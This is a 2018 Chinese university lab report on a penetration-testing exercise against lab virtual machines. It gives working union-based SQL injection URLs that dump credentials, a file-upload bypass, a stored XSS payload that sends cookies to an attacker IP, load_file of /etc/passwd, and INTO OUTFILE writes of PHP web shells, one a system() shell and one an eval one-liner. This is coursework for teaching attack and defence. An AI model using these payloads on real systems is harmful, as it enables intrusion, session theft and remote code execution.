10.23实验五

学   号

 

中国人民公安大学

Chinese people public security university

 

网络对抗技术

实验报告

 

实验五

综合渗透

 

 

 

学生姓名

姜李萌 

年级

2015 级

区队

网安五区 

指导教师

高见 

 

 

信息技术与网络安全学院

2018年10月23

 

实验任务总纲

2017—2018 学年 第  学期

一、实验目的

1.通过对木马的练习,使读者理解和掌握木马传播和运行的机制;通过手动删除木马,掌握检查木马和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识。

 

2.了解并熟悉常用的网络攻击工具,木马的基本功能;

3.达到巩固课程知识和实际应用的目的。

二、实验要求

1.认真阅读每个实验内容,需要截图的题目,需清晰截图并对截图进行标注和说明。

2.文档要求结构清晰,图文表达准确,标注规范。推理内容客观、合理、逻辑性强。

3.软件工具可使用NC、MSF等。

4.实验结束后,保留电子文档。

、实验步骤

1.准备

提前做好实验准备,实验前应把详细了解实验目的、实验要求和实验内容,熟悉并准备好实验用的软件工具,按照实验内容和要求提前做好实验内容的准备。

2.实验环境

描述实验所使用的硬件和软件环境(包括各种软件工具);

开机并启动软件office2003或2007、浏览器、加解密软件。

3.实验过程

1)启动系统和启动工具软件环境。

2)用软件工具实现实验内容。

4.实验报告

按照统一要求的实验报告格式书写实验报告。把按照模板格式编写的文档嵌入到实验报告文档中,文档按照规定的书写格式书写,表格要有表说图形要有图说。

 

1.sql注入

首先搭建虚拟机 kali扫描下当前网段 发现一个192.168.138.134的可疑ip地址

 

 

 

打开该虚拟机提供的网页 使用发现可能存在sql注入点

http://192.168.138.134/cat.php?id=1

http://192.168.138.134/cat.php?id=1'

 

 

 

 

 

 

 

 

 

使用order by语句试出网站后台数据库表的列数 当order by 5 时网页报错 因此该查询涉及到四列元素

 

 

 

使用联合查询 查看网页的显示位

 

 

 

 

 发现2是回显位,发现数据库的名字为photoblog

 

 

 

 

http://192.168.138.134/cat.php?id=-2%20union%20select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema=%27photoblog%27

顺势查到数据库中的表,可见users表对我们有用

 

 

 

http://192.168.138.134/cat.php?id=-2%20union%20select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_name=%27users%27

继续查询users表中列名,有变量名 idloginpassword

 

 

 

 查看users表中的数据:id=1 login=admin password=8efe310f9ab3efeae8d410a8e0166eb2

http://192.168.138.134/cat.php?id=-1%20union%20select%201,group_concat(id,0x23,login,0x23,password),3,4%20from%20users

 

 

 

 

 

 

jiemi

MD5解密后,得到密码P4ssw0rd

 

 

 

 

登录到管理员页面

 

 

 

尝试上传文件,发现nophp

 

 

 

改完后缀名发现,可以绕过,并上传成功

 

 

 

 

 

 

 

 得到目录,用菜刀连一下

 

 

 

 

 

 

2.xss靶机攻击

 

 

 

nmap 扫描一下发现靶机开着80端口和ssh协议

 

 

 

 

 

发现有弹窗回显,存在xss漏洞

在靶机上留言<script>document.write('<img src="http://192.168.138.139/?'+document.cookie+' "/>')</script>

可以将任意登录用户的cookie发送到指定ip 在指定 ip 接受 cookie 后可以伪造成登陆者

 

 

 

在原来机器上登录admin账户,密码P4ssw0rd

 

 

 

 

 

刷新下页面,发现已经已admin的身份登录进页面中。

进入管理界面后,发现博客编辑界面存在sql注入漏洞。

 

 

 

 

http://192.168.138.135/admin/edit.php?id=4 union select 1,2,3,4

发现23可以显示出来。

 

 

 

 

http://192.168.138.135/admin/edit.php?id=0 union select 1,2,load_file("/etc/passwd"),4

 

 

 

可以读取passwd文件,但是不能读取shadow文件。我们尝试能不能创建一个文件。

在编辑页面发现错误提示中有/var/www/classes 目录,

 

 

 

尝试后发现/var/www/css 目录可写。

于是构造语句:

http://192.168.138.135/admin/edit.php?id=2%20union%20select%201,2,3,4%20into%20outfile%20%22/var/www/css/s.php%22

然后打开

http://192.168.138.135/css/s.php

 

 

 

说明s.php文件成功写入到/var/www/css 目录,下面将

<?php system($_GET['c']); ?>

写入z.php中,构造url为:

http://192.168.138.135/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20system($_GET[%27c%27]);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/z.php%22

访问z.php,并使用uname -a获取系统信息。可以远程执行命令。

 

 

 

下面写入一句话木马,构造url

http://192.168.138.135/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20@eval($_POST[%27chopper%27]);?%3E%22,4%20into%20outfile%20%22/var/www/css/dao.php%22

 

 

 

 

 

 

 

posted @ 2018-10-27 14:52  p201521450005  阅读(118)  评论(0)    收藏  举报